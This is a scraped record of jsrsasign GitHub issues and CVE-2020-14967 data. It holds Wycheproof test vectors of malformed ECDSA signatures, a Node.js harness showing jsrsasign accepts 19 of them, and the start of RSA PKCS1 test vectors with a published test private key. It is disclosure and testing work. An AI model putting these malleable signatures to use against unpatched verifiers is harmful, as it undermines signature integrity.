"3049228003202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180000022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 45, "comment" : "using composition with wrong tag", "msg" : "313233343030", "sig" : "304902202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e182280032100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0000", "result" : "invalid", "flags" : [] }, { "tcId" : 46, "comment" : "Replacing sequence with NULL", "msg" : "313233343030", "sig" : "0500", "result" : "invalid", "flags" : [] }, { "tcId" : 47, "comment" : "changing tag value of sequence", "msg" : "313233343030", "sig" : "2e4502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 48, "comment" : "changing tag value of sequence", "msg" : "313233343030", "sig" : "2f4502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 49, "comment" : "changing tag value of sequence", "msg" : "313233343030", "sig" : "314502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 50, "comment" : "changing tag value of sequence", "msg" : "313233343030", "sig" : "324502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 51, "comment" : "changing tag value of sequence", "msg" : "313233343030", "sig" : "ff4502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 52, "comment" : "dropping value of sequence", "msg" : "313233343030", "sig" : "3000", "result" : "invalid", "flags" : [] }, { "tcId" : 53, "comment" : "using composition for sequence", "msg" : "313233343030", "sig" : "30493001023044202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 54, "comment" : "truncated sequence", "msg" : "313233343030", "sig" : "304402202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847", "result" : "invalid", "flags" : [] }, { "tcId" : 55, "comment" : "truncated sequence", "msg" : "313233343030", "sig" : "3044202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 56, "comment" : "indefinite length", "msg" : "313233343030", "sig" : "308002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0000", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 57, "comment" : "indefinite length with truncated delimiter", "msg" : "313233343030", "sig" : "308002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db00", "result" : "invalid", "flags" : [] }, { "tcId" : 58, "comment" : "indefinite length with additional element", "msg" : "313233343030", "sig" : "308002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db05000000", "result" : "invalid", "flags" : [] }, { "tcId" : 59, "comment" : "indefinite length with truncated element", "msg" : "313233343030", "sig" : "308002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db060811220000", "result" : "invalid", "flags" : [] }, { "tcId" : 60, "comment" : "indefinite length with garbage", "msg" : "313233343030", "sig" : "308002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0000fe02beef", "result" : "invalid", "flags" : [] }, { "tcId" : 61, "comment" : "indefinite length with nonempty EOC", "msg" : "313233343030", "sig" : "308002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0002beef", "result" : "invalid", "flags" : [] }, { "tcId" : 62, "comment" : "prepend empty sequence", "msg" : "313233343030", "sig" : "3047300002202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 63, "comment" : "append empty sequence", "msg" : "313233343030", "sig" : "304702202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db3000", "result" : "invalid", "flags" : [] }, { "tcId" : 64, "comment" : "append garbage with high tag number", "msg" : "313233343030", "sig" : "304802202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847dbbf7f00", "result" : "invalid", "flags" : [] }, { "tcId" : 65, "comment" : "sequence of sequence", "msg" : "313233343030", "sig" : "3047304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 66, "comment" : "truncated sequence: removed last 1 elements", "msg" : "313233343030", "sig" : "302202202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18", "result" : "invalid", "flags" : [] }, { "tcId" : 67, "comment" : "repeating element in sequence", "msg" : "313233343030", "sig" : "306802202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 68, "comment" : "long form encoding of length of integer", "msg" : "313233343030", "sig" : "30460281202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 69, "comment" : "long form encoding of length of integer", "msg" : "313233343030", "sig" : "304602202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e1802812100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 70, "comment" : "length of integer contains leading 0", "msg" : "313233343030", "sig" : "3047028200202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 71, "comment" : "length of integer contains leading 0", "msg" : "313233343030", "sig" : "304702202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180282002100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 72, "comment" : "wrong length of integer", "msg" : "313233343030", "sig" : "304502212ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 73, "comment" : "wrong length of integer", "msg" : "313233343030", "sig" : "3045021f2ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 74, "comment" : "wrong length of integer", "msg" : "313233343030", "sig" : "304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022200b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 75, "comment" : "wrong length of integer", "msg" : "313233343030", "sig" : "304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022000b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 76, "comment" : "uint32 overflow in length of integer", "msg" : "313233343030", "sig" : "304a028501000000202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 77, "comment" : "uint32 overflow in length of integer", "msg" : "313233343030", "sig" : "304a02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180285010000002100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 78, "comment" : "uint64 overflow in length of integer", "msg" : "313233343030", "sig" : "304e02890100000000000000202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 79, "comment" : "uint64 overflow in length of integer", "msg" : "313233343030", "sig" : "304e02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18028901000000000000002100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 80, "comment" : "length of integer = 2**31 - 1", "msg" : "313233343030", "sig" : "304902847fffffff2ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 81, "comment" : "length of integer = 2**31 - 1", "msg" : "313233343030", "sig" : "304902202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e1802847fffffff00b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 82, "comment" : "length of integer = 2**32 - 1", "msg" : "313233343030", "sig" : "30490284ffffffff2ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 83, "comment" : "length of integer = 2**32 - 1", "msg" : "313233343030", "sig" : "304902202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180284ffffffff00b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 84, "comment" : "length of integer = 2**40 - 1", "msg" : "313233343030", "sig" : "304a0285ffffffffff2ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 85, "comment" : "length of integer = 2**40 - 1", "msg" : "313233343030", "sig" : "304a02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180285ffffffffff00b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 86, "comment" : "length of integer = 2**64 - 1", "msg" : "313233343030", "sig" : "304d0288ffffffffffffffff2ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 87, "comment" : "length of integer = 2**64 - 1", "msg" : "313233343030", "sig" : "304d02202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180288ffffffffffffffff00b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 88, "comment" : "incorrect length of integer", "msg" : "313233343030", "sig" : "304502ff2ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 89, "comment" : "incorrect length of integer", "msg" : "313233343030", "sig" : "304502202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e1802ff00b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 90, "comment" : "removing integer", "msg" : "313233343030", "sig" : "3023022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 91, "comment" : "lonely integer tag", "msg" : "313233343030", "sig" : "302402022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 92, "comment" : "lonely integer tag", "msg" : "313233343030", "sig" : "302302202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e1802", "result" : "invalid", "flags" : [] }, { "tcId" : 93, "comment" : "appending 0's to integer", "msg" : "313233343030", "sig" : "304702222ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180000022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 94, "comment" : "appending 0's to integer", "msg" : "313233343030", "sig" : "304702202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022300b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0000", "result" : "invalid", "flags" : [] }, { "tcId" : 95, "comment" : "prepending 0's to integer", "msg" : "313233343030", "sig" : "3047022200002ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 96, "comment" : "prepending 0's to integer", "msg" : "313233343030", "sig" : "304702202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180223000000b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [ "BER" ] }, { "tcId" : 97, "comment" : "appending unused 0's to integer", "msg" : "313233343030", "sig" : "304702202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180000022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 98, "comment" : "appending null value to integer", "msg" : "313233343030", "sig" : "304702222ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e180500022100b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db", "result" : "invalid", "flags" : [] }, { "tcId" : 99, "comment" : "appending null value to integer", "msg" : "313233343030", "sig" : "304702202ba3a8be6b94d5ec80a6d9d1190a436effe50d85a1eee859b8cc6af9bd5c2e18022300b329f479a2bbd0a5c384ee1493b1f5186a87139cac5df4087c134b49156847db0500", "result" : "invalid", "flags" : [] } ] } ] } ``` Using the following proof of concept: ``` var rs = require('jsrsasign'); var obj = require("./poc_ecdsa_secp256r1_sha256_test.json"); for (let testGroup of obj.testGroups) { var keyPem = testGroup.keyPem; for(let test of testGroup.tests) { console.log("[*] Test " + test.tcId + " result: " + test.result) try { var sig = new rs.Signature({alg: 'SHA256withECDSA'}); sig.init(keyPem); sig.updateHex(test.msg); var result = sig.verify(test.sig); if (result == true) { if (test.result == "valid" || test.result == "acceptable") console.log("Result: PASS"); else console.log("Result: FAIL") } if (result == false) { if (test.result == "valid" || test.result == "acceptable") console.log("Result: FAIL"); else console.log("Result: PASS") } } catch (e) { console.log("ERROR - VERIFY: " + e) if (test.result == "valid" || test.result == "acceptable") console.log("Result: FAIL"); else console.log("Result: PASS") } } } ``` The output is: ``` [*] Test 4 result: invalid Result: FAIL [*] Test 5 result: invalid Result: FAIL [*] Test 7 result: invalid Result: FAIL [*] Test 8 result: invalid Result: FAIL [*] Test 9 result: invalid Result: FAIL [*] Test 22 result: invalid Result: FAIL [*] Test 68 result: invalid Result: FAIL [*] Test 69 result: invalid Result: FAIL [*] Test 70 result: invalid Result: FAIL [*] Test 71 result: invalid Result: FAIL [*] Test 74 result: invalid Result: FAIL [*] Test 76 result: invalid Result: FAIL [*] Test 77 result: invalid Result: FAIL [*] Test 78 result: invalid Result: FAIL [*] Test 79 result: invalid Result: FAIL [*] Test 81 result: invalid Result: FAIL [*] Test 89 result: invalid Result: FAIL [*] Test 95 result: invalid Result: FAIL [*] Test 96 result: invalid Result: FAIL ``` However, if you use node.js crypto: ``` const crypto = require('crypto'); var obj = require("./poc_ecdsa_secp256r1_sha256_test.json"); for (let testGroup of obj.testGroups) { keyPem = testGroup.keyPem; for(let test of testGroup.tests) { console.log("[*] Test " + test.tcId + " result: " + test.result) var verifier = crypto.createVerify('SHA256'); verifier.update(Buffer.from(test.msg, 'hex')); var result = (verifier.verify(keyPem, Buffer.from(test.sig, 'hex'))) if (result == true) { if (test.result == "valid" || test.result == "acceptable") console.log("Result: PASS"); else console.log("Result: FAIL") } if (result == false) { if (test.result == "valid" || test.result == "acceptable") console.log("Result: FAIL"); else console.log("Result: PASS") } } } ``` the output is: ``` [*] Test 4 result: invalid Result: PASS [*] Test 5 result: invalid Result: PASS [*] Test 7 result: invalid Result: PASS [*] Test 8 result: invalid Result: PASS [*] Test 9 result: invalid Result: PASS [*] Test 22 result: invalid Result: PASS [*] Test 68 result: invalid Result: PASS [*] Test 69 result: invalid Result: PASS [*] Test 70 result: invalid Result: PASS [*] Test 71 result: invalid Result: PASS [*] Test 74 result: invalid Result: PASS [*] Test 76 result: invalid Result: PASS [*] Test 77 result: invalid Result: PASS [*] Test 78 result: invalid Result: PASS [*] Test 79 result: invalid Result: PASS [*] Test 81 result: invalid Result: PASS [*] Test 89 result: invalid Result: PASS [*] Test 95 result: invalid Result: PASS [*] Test 96 result: invalid Result: PASS ``` Best regards, Antonio
Lack of encoding checking in jsrsasign allows a certain degree of malleability in ECDSA signatures
https://api.github.com/repos/kjur/jsrsasign/issues/437/comments
2
2020-06-06T18:11:17Z
2020-08-24T23:05:44Z
https://github.com/kjur/jsrsasign/issues/437
632,639,446
437
1,303
CVE-2020-14967
2020-06-22T12:15:10.150
An issue was discovered in the jsrsasign package before 8.0.18 for Node.js. Its RSA PKCS1 v1.5 decryption implementation does not detect ciphertext modification by prepending '\0' bytes to ciphertexts (it decrypts modified ciphertexts without error). An attacker might prepend these bytes with the goal of triggering memory corruption issues.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/issues/439" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.17" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.18" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://kjur.github.io/jsrsasign/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200724-0001/" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/jsrsasign" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/issues/439" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://kjur.github.io/jsrsasign/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200724-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/jsrsasign" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsrsasign_project:jsrsasign:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "6DDC5099-39B1-4D97-BF5E-9E6458481AAC", "versionEndExcluding": "8.0.18", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:*", "matchCriteriaId": "FD1FCB0D-3E19-4461-9330-4D7F02972A35", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/kjur/jsrsasign/issues/439
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kjur", "jsrsasign" ]
The jsrsasign 8.0.16 RSA PKCS1 v1.5 decryption implementation does not detect prepended 0's bytes to the ciphertext and accepts modified ciphertexts without error. You can verify this using the following test vectors from Google Wycheproof: ``` { "algorithm" : "RSAES-PKCS1-v1_5", "generatorVersion" : "0.8r12", "numberOfTests" : 65, "header" : [ "Test vectors of type RsaesPkcs1Decrypt are intended to check the decryption", "of RSA encrypted ciphertexts." ], "notes" : { "InvalidPkcs1Padding" : "This is a test vector with an invalid PKCS #1 padding. Implementations must ensure that different error conditions cannot be distinguished, since the information about the error condition can be used for a padding oracle attack. (RFC 8017 Section 7.2.2)" }, "schema" : "rsaes_pkcs1_decrypt_schema.json", "testGroups" : [ { "d" : "1a502d0eea6c7b69e21d5839101f705456ed0ef852fb47fe21071f54c5f33c8ceb066c62d727e32d26c58137329f89d3195325b795264c195d85472f7507dbd0961d2951f935a26b34f0ac24d15490e1128a9b7138915bc7dbfa8fe396357131c543ae9c98507368d9ceb08c1c6198a3eda7aea185a0e976cd42c22d00f003d9f19d96ea4c9afcbfe1441ccc802cfb0689f59d804c6a4e4f404c15174745ed6cb8bc88ef0b33ba0d2a80e35e43bc90f350052e72016e75b00d357a381c9c0d467069ca660887c987766349fcc43460b4aa516bce079edd87ba164307b752c277ed9528ad3ba0bf1877349ed3b7966a6c240110409bf4d0fade0c68fdadd847fd", "e" : "010001", "keysize" : 2048, "n" : "00b3510a2bcd4ce644c5b594ae5059e12b2f054b658d5da5959a2fdf1871b808bc3df3e628d2792e51aad5c124b43bda453dca5cde4bcf28e7bd4effba0cb4b742bbb6d5a013cb63d1aa3a89e02627ef5398b52c0cfd97d208abeb8d7c9bce0bbeb019a86ddb589beb29a5b74bf861075c677c81d430f030c265247af9d3c9140ccb65309d07e0adc1efd15cf17e7b055d7da3868e4648cc3a180f0ee7f8e1e7b18098a3391b4ce7161e98d57af8a947e201a463e2d6bbca8059e5706e9dfed8f4856465ffa712ed1aa18e888d12dc6aa09ce95ecfca83cc5b0b15db09c8647f5d524c0f2e7620a3416b9623cadc0f097af573261c98c8400aa12af38e43cad84d", "privateKeyJwk" : { "alg" : "RSA1_5", "d" : "GlAtDupse2niHVg5EB9wVFbtDvhS-0f-IQcfVMXzPIzrBmxi1yfjLSbFgTcyn4nTGVMlt5UmTBldhUcvdQfb0JYdKVH5NaJrNPCsJNFUkOESiptxOJFbx9v6j-OWNXExxUOunJhQc2jZzrCMHGGYo-2nrqGFoOl2zULCLQDwA9nxnZbqTJr8v-FEHMyALPsGifWdgExqTk9ATBUXR0XtbLi8iO8LM7oNKoDjXkO8kPNQBS5yAW51sA01ejgcnA1GcGnKZgiHyYd2Y0n8xDRgtKpRa84Hnt2HuhZDB7dSwnftlSitO6C_GHc0ntO3lmpsJAEQQJv00PreDGj9rdhH_Q", "dp" : "lql5jSUCY0ALtidzQogWJ-B87N-RGHsBuJ_0cxQYinwg-ySAAVbSyF1WZujfbO_5-YBN362A_1dn3lbswCnHK_bHF9-fZNqvwprPnceQj5oK1n4g6JSZNsy6GNAhosT-uwQ0misgR8SQE4W25dDGkdEYsz-BgCsyrCcu8J5C-tU", "dq" : "BVT0GwuH9opFcis74M9KseFlA0wakQAquPKenvni2rb-57JFW6-0IDfp0vflM_NIoUdBL9cggL58JjP12ALJHDnmvOzj5nXlmZUDPFVzcCDa2eizDQS4KK37kwStVKEaNaT1BwmHasWxGCNrp2pNfJopHdlgexad4dGCOFaRmZ8", "e" : "AQAB", "kid" : "none", "kty" : "RSA", "n" : "s1EKK81M5kTFtZSuUFnhKy8FS2WNXaWVmi_fGHG4CLw98-Yo0nkuUarVwSS0O9pFPcpc3kvPKOe9Tv-6DLS3Qru21aATy2PRqjqJ4CYn71OYtSwM_ZfSCKvrjXybzgu-sBmobdtYm-sppbdL-GEHXGd8gdQw8DDCZSR6-dPJFAzLZTCdB-Ctwe_RXPF-ewVdfaOGjkZIzDoYDw7n-OHnsYCYozkbTOcWHpjVevipR-IBpGPi1rvKgFnlcG6d_tj0hWRl_6cS7RqhjoiNEtxqoJzpXs_Kg8xbCxXbCchkf11STA8udiCjQWuWI8rcDwl69XMmHJjIQAqhKvOOQ8rYTQ", "p" : "7BJc834xCi_0YmO5suBinWOQAF7IiRPU-3G9TdhWEkSYquupg9e6K9lC5k0iP-t6I69NYF7-6mvXDTmv6Z01o6oV50oXaHeAk74O3UqNCbLe9tybZ_-FdkYlwuGSNttMQBzjCiVy0-y0-Wm3rRnFIsAtd0RlZ24aN3bFTWJINIs", "q" : "wnQqvNmJe9SwtnH5c_yCqPhKv1cF_4jdQZSGI6_p3KYNxlQzkHZ_6uvrU5V27ov6YbX8vKlKfO91oJFQxUD6lpTdgAStI3GMiJBJIZNpyZ9EWNSvwUj28H34cySpbZz3s4XdhiJBShgy-fKURvBQwtWmQHZJ3EGrcOI7PcwiyYc", "qi" : "HGQBidm_6MYjgzIQp2xCDG9E5ddg4lmRbOwq4rFWRWlg_ZXidHZgw4lWIlDwVQSc-rflwwOVSThKeiquscgk069wlIKoz5tYcCKgCx8HIttQ8zyybcIN0iRdUmXfYe4pg8k4whZ9zuEh_EtEecI35yjPYzq2CowOzQT85-O6pVk" }, "privateKeyPem" : "-----BEGIN RSA PRIVATE 